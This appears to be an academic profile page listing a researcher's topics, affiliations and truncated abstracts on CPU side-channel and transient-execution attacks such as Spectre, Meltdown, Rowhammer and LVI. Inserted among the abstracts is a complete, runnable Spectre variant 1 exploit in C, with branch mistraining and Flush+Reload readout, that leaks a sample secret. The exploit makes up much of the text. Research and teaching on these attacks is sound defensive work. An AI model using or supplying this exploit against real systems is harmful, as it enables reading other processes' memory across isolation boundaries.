- Security and Verification in Computing
- Advanced Malware Detection Techniques
- Cloud Data Security Solutions
- Physical Unclonable Functions (PUFs) and Hardware Security
- Network Security and Intrusion Detection
- Cryptographic Implementations and Security
- Parallel Computing and Optimization Techniques
- Diamond and Carbon-based Materials Research
- Distributed systems and fault tolerance
- Advanced Memory and Neural Computing
- Digital and Cyber Forensics
- Semiconductor materials and devices
- User Authentication and Security Systems
- Internet Traffic Analysis and Secure E-voting
- Radiation Effects in Electronics
- Advanced Data Storage Technologies
- Adversarial Robustness in Machine Learning
- Web Application Security Vulnerabilities
- Low-power high-performance VLSI design
- Smart Grid Security and Resilience
- Pharmacological Receptor Mechanisms and Effects
- Access Control and Trust
- Marine Toxins and Detection Methods
- Model-Driven Software Engineering Techniques
- Digital Media Forensic Detection
Graz University of Technology
2015-2024
Institut für Informationsverarbeitung
2018-2021
University of Michigan
2020
Microsoft Research (United Kingdom)
2017
Modern processors use branch prediction and speculative execution to maximize performance. For example, if the destination of a branch depends on a memory value that is in the process of being read, CPUs will try to guess the destination and attempt to execute ahead. When the memory value finally arrives, the CPU either discards or commits the speculative computation. Speculative logic is unfaithful in how it executes, can access the victim's memory and registers, and can perform operations with measurable side effects. Spectre attacks involve inducing a victim to speculatively perform operations that would not occur during...
Recent work on cache attacks has shown that CPU caches represent a powerful source of information leakage. However, existing attacks require manual identification of vulnerabilities, i.e., data accesses or instruction execution depending on secret information. In this paper, we present Cache Template Attacks. This generic attack technique allows us to profile and exploit cache-based information leakage of any program automatically, without prior knowledge of specific software versions or even specific system information. Cache Template Attacks can be executed...
Recent work shows that the Rowhammer hardware bug can be used to craft powerful attacks and completely subvert a system. However, existing efforts either describe probabilistic (and thus unreliable) attacks or rely on special (and often unavailable) memory management features to place victim objects in vulnerable physical memory locations. Moreover, prior work only targets x86, and researchers have openly wondered whether Rowhammer attacks on other architectures, such as ARM, are even possible. We show that deterministic Rowhammer attacks are feasible on commodity mobile...
In early 2018, Meltdown first showed how to read arbitrary kernel memory from user space by exploiting side-effects of transient instructions. While this attack has been mitigated through stronger isolation boundaries between user and kernel space, Meltdown inspired an entirely new class of fault-driven transient-execution attacks. Particularly, over the past year, Meltdown-type attacks have been extended to not only leak data from the L1 cache but also from various other microarchitectural structures, including the FPU register file and the store buffer.
Dynamic frequency and voltage scaling features have been introduced to manage the ever-growing heat and power consumption in modern processors. Design restrictions ensure that frequency and voltage are adjusted as a pair, based on the current load, because for each frequency there is only a certain voltage range where the processor can operate correctly. For this purpose, many processors (including the widespread Intel Core series) expose privileged software interfaces to dynamically regulate processor frequency and operating voltage. In this paper, we demonstrate that these interfaces can be...
In the last 10 years, cache attacks on Intel x86 CPUs have gained increasing attention among the scientific community, and powerful techniques to exploit cache side channels have been developed. However, modern smartphones use one or more multi-core ARM CPUs that have a different cache organization and instruction set than Intel x86 CPUs. So far, no cross-core cache attacks have been demonstrated on non-rooted Android smartphones. In this work, we demonstrate how to solve key challenges to perform the most powerful cross-core cache attacks Prime+Probe, Flush+Reload, Evict+Reload, and Flush+Flush on ARM-based devices...
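The speculation mechanism described in the Spectre abstract above, read out with the Flush+Reload cache side channel named in the cache-attack abstracts, as one concrete program. This is an added illustration, not code from any of the listed papers. It assumes an x86-64 machine (clflush and rdtscp are used through inline assembly; on other architectures those primitives compile to no-ops and nothing leaks), a page-sized stride so each byte value maps to its own cache line, and a constructed secret string that stands in for the victim's data.

```c
/*
 * Spectre variant 1 (bounds-check bypass) read out with Flush+Reload.
 * Added illustration; not code from any of the papers listed on this page.
 * Only the x86-64 primitives are real; elsewhere they are no-ops.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE 4096
#define ENTRIES 256

static inline void flush(const void *p) {
#if defined(__x86_64__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p;
#endif
}

/* Cycles for one load of *p; a cached line returns far faster than DRAM. */
static inline uint64_t time_load(const void *p) {
#if defined(__x86_64__)
    uint32_t lo, hi, aux;
    uint64_t t0, t1;
    __asm__ volatile("rdtscp" : "=a"(lo), "=d"(hi), "=c"(aux) : : "memory");
    t0 = ((uint64_t)hi << 32) | lo;
    __asm__ volatile("movb (%0), %%al" : : "r"(p) : "rax", "memory");
    __asm__ volatile("rdtscp" : "=a"(lo), "=d"(hi), "=c"(aux) : : "memory");
    t1 = ((uint64_t)hi << 32) | lo;
    return t1 - t0;
#else
    (void)p;
    return 0;
#endif
}

static uint8_t array1[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
static volatile unsigned array1_size = 16;   /* flushed so the check resolves late */
static uint8_t probe[ENTRIES * PAGE];         /* one page per possible byte value */
static volatile uint8_t sink;
static const char *secret = "constructed sample secret";  /* assumption: stand-in data */

/* The gadget: architecturally safe. After mistraining, the branch is predicted
 * taken for an out-of-range x, array1[x] is loaded transiently and
 * probe[value * PAGE] lands in the cache before the speculation is squashed. */
static void victim(size_t x) {
    if (x < array1_size)
        sink = probe[array1[x] * PAGE];
}

/* Branch-free index choice for round j: five in-bounds training rounds, then
 * one malicious round, without a branch that would itself retrain the predictor. */
static size_t select_index(int j, size_t training_x, size_t malicious_x) {
    size_t m = (size_t)((j % 6) - 1) & ~(size_t)0xFFFF;
    m = m | (m >> 16);                  /* 0 for training rounds, ~0 for the 6th */
    return training_x ^ (m & (malicious_x ^ training_x));
}

/* Most-hit probe line, or -1 if no line was ever observed cached. */
static int best_guess(const int hits[ENTRIES]) {
    int best = -1, best_hits = 0;
    for (int i = 0; i < ENTRIES; i++)
        if (hits[i] > best_hits) { best_hits = hits[i]; best = i; }
    return best;
}

/* Leak the byte at array1 + malicious_x through the probe array. */
static int read_byte(size_t malicious_x, uint64_t threshold) {
    int hits[ENTRIES] = {0};
    for (int tries = 0; tries < 200; tries++) {
        for (int i = 0; i < ENTRIES; i++) flush(&probe[i * PAGE]);
        size_t training_x = tries % 16;
        for (int j = 29; j >= 0; j--) {
            flush((const void *)&array1_size);
            for (volatile int z = 0; z < 100; z++) {}   /* let the flush land */
            victim(select_index(j, training_x, malicious_x));
        }
        /* Flush+Reload in a scrambled order so the prefetcher does not help. */
        for (int i = 0; i < ENTRIES; i++) {
            int mix = (i * 167 + 13) & 255;
            if (time_load(&probe[mix * PAGE]) <= threshold && mix != array1[training_x])
                hits[mix]++;
        }
    }
    return best_guess(hits);
}

int main(void) {
    /* Crude calibration: one cached and one flushed access on this machine. */
    memset(probe, 1, sizeof probe);
    sink = probe[0];
    uint64_t hit = time_load(&probe[0]);
    flush(&probe[0]);
    uint64_t miss = time_load(&probe[0]);
    uint64_t threshold = (hit + miss) / 2;
    size_t off = (size_t)((uintptr_t)secret - (uintptr_t)array1);
    for (size_t i = 0; i < strlen(secret); i++) {
        int b = read_byte(off + i, threshold);
        printf("%c", (b >= 32 && b < 127) ? b : '?');
    }
    printf("\n");
    return 0;
}
```

Build with optimization (e.g. -O2) so the gadget stays a single predicted branch; with mitigations such as a compiler-inserted lfence after the bounds check, or on a CPU that is not vulnerable, the recovered string degrades to '?' characters, which is the expected result rather than a bug in the example.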
Modern operating systems use hardware support to protect against control-flow hijacking attacks such as code-injection attacks. Typically, write access to executable pages is prevented and kernel mode execution is restricted to kernel code pages only. However, current CPUs provide no protection against code-reuse attacks like ROP. ASLR is used to prevent these attacks by making all addresses unpredictable for an attacker. Hence, the kernel security relies fundamentally on preventing access to address information. We introduce Prefetch Side-Channel Attacks, a...
The Rowhammer bug allows unauthorized modification of bits in DRAM cells from unprivileged software, enabling powerful privilege-escalation attacks. Sophisticated Rowhammer countermeasures have been presented, aiming at mitigating the Rowhammer bug or its exploitation. However, the state of the art provides insufficient insight on the completeness of these defenses. In this paper, we present novel Rowhammer attack and exploitation primitives, showing that even a combination of all defenses is ineffective. Our new attack technique, one-location...
Meltdown and Spectre enable arbitrary data leakage from memory via various side channels. Short-term software mitigations for Meltdown are only a temporary solution with a significant performance overhead. Due to hardware fixes, these mitigations are disabled on recent processors. In this paper, we show that Meltdown-like attacks are still possible on recent CPUs which are not vulnerable to Meltdown. We identify two behaviors of the store buffer, a microarchitectural resource to reduce the latency for data stores, that enable powerful attacks. The first behavior,...
The recent Spectre attack first showed how to inject incorrect branch targets into a victim domain by poisoning microarchitectural branch prediction history. In this paper, we generalize injection-based methodologies to the memory hierarchy by directly injecting incorrect, attacker-controlled values into a victim's transient execution. We propose Load Value Injection (LVI) as an innovative technique to reversely exploit Meltdown-type microarchitectural data leakage. LVI abuses that faulting or assisted loads, executed by a legitimate...
Lessons learned from Meltdown's exploitation of the weaknesses in today's processors.
Power side-channel attacks exploit variations in power consumption to extract secrets from a device, e.g., cryptographic keys. Prior attacks have typically required physical access to the target device and specialized equipment such as probes and a high-resolution oscilloscope. In this paper, we present PLATYPUS attacks, which are novel software-based power side-channel attacks on Intel server, desktop, and laptop CPUs. We exploit the unprivileged access to the Intel Running Average Power Limit (RAPL) interface that exposes values directly correlated with power consumption, forming...
Covert channels evade isolation mechanisms between multiple parties in the cloud. Especially cache covert channels allow the transmission of several hundred kilobits per second between unprivileged user programs in separate virtual machines. However, caches are small and shared, and thus cache-based communication is susceptible to noise from any system activity and interrupts. The feasibility of a reliable cache covert channel under a severe noise scenario has not been demonstrated yet. Instead, previous work relies on either of two contradicting...
Research on transient execution attacks including Spectre and Meltdown showed that exception or branch misprediction events might leave secret-dependent traces in the CPU's microarchitectural state. This observation led to a proliferation of new Spectre and Meltdown attack variants and even more ad-hoc defenses (e.g., microcode and software patches). Both industry and academia are now focusing on finding effective defenses for known issues. However, we only have limited insight on the residual attack surface and the completeness of the proposed defenses. In this...